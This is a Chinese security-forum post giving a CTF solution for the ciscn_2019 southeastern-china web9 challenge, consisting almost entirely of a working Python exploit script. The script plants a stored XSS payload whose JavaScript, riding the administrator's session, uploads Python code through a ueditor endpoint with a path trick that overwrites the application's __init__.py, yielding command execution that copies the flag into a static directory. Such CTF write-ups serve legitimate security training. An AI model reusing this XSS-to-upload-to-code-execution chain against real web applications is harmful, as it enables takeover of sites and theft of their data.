学逆向论坛

找回密码
立即注册

只需一步,快速开始

学逆向论坛»论坛 软件安全 CTF专区 ciscn_2019_web_southeastern-china-web9
发新帖
roger

2万

积分

41

好友

1168

主题

[Web] ciscn_2019_web_southeastern-china-web9

发表于 2020-5-9 14:11:45 | 查看: 3143| 回复: 0


  • XSS 拿到管理员 Cokkie。
  • 任意文件上传,覆盖 init.py,让程序重启加载,把 flag 写到静态资源目录。

#!/usr/bin/python2.7
#coding:utf-8

from sys import *
import requests
import re
import time
host = 'web56.buuoj.cn'
port = 80
timeout = 30

#get csrfmiddlewaretoken
def get_token():
    url='http://'+host+':'+str(port)+r'/api/get_token'
    print url
    req=requests.get(url,timeout=timeout)
    json=req.json()
    print json
    # exit()
    #print json['token']
    return json['token']


def add_paper(token):
    content=r'''<script>function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1:8000\/admin\/ueditor\/controller\/?imagePathFormat=.\/CISCN\/__init__.py&filePathFormat=uploads%2Ffiles%2F&action=uploadimage&encode=utf-8", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------304576285")
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
xhr.withCredentials = true;
var body = "----------304576285\r\n" +
  "Content-Disposition: form-data; name=\"id\"\r\n" +
  "\r\n" +
  "WU_FILE_0\r\n" +
  "----------304576285\r\n" +
  "Content-Disposition: form-data; name=\"name\"\r\n" +
  "\r\n" +
  "Chr.jpg\r\n" +
  "----------304576285\r\n" +
  "Content-Disposition: form-data; name=\"type\"\r\n" +
  "\r\n" +
  "image/jpeg\r\n" +
  "----------304576285\r\n" +
  "Content-Disposition: form-data; name=\"lastModifidDate\"\r\n" +
  "\r\n" +
  "The Jul 14 2009 13:32:31 GMT 0000\r\n" +
  "----------304576285\r\n" +
  "Content-Disposition: form-data; name=\"size\"\r\n" +
  "\r\n" +
  "0123\r\n" +
  "----------304576285\r\n" +
  "Content-Disposition: form-data; name=\"upfile\"; filename=\"Chr.jpg\"\r\n" +
  "Content-Type: image/jepg\r\n" +
  "\r\n" +
  "import os;os.system(\"cp /flag.txt /usr/local/lib/python2.7/site-packages/django/contrib/admin/static/\")\r\n" +
  "----------304576285--\r\n" +
  "\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
window.onload=submitRequest();
</script>
    '''
    #print(content)
    url='http://'+host+':'+str(port)+r'/api/add_paper'
    cookie={
        'csrftoken':token,
    }
    body={
        'csrfmiddlewaretoken':token,
        'content':content,
    }
    req=requests.post(url,data=body,cookies=cookie,timeout=timeout)
    #print req.text
    return req.json()['url']

def getshell():
    url='http://'+host+':'+str(port)
    url1=url+r'/api/send_paper'
    print url1
    #get token
    token=get_token()
    print token
    # exit()
    #get the key
    uri=add_paper(token)
    key=uri[1:]
    print(key)
    # exit()
    body={
        'csrfmiddlewaretoken':token,
        'key':key,
    }
    req=requests.post(url1,data=body,cookies={'csrftoken':token},timeout=timeout)
    #delay 1s ensure the flag move to staticfiles
    time.sleep(5)
    req2=requests.get(url+'/static/flag.txt')
    if 'flag' in req2.text:
        return req2.text
    else:
        return 'try again'

if __name__ == '__main__':
    print(getshell())


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046
返回列表

小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图

GMT+8, 2024-11-23 01:44 , Processed in 0.123222 second(s), 36 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表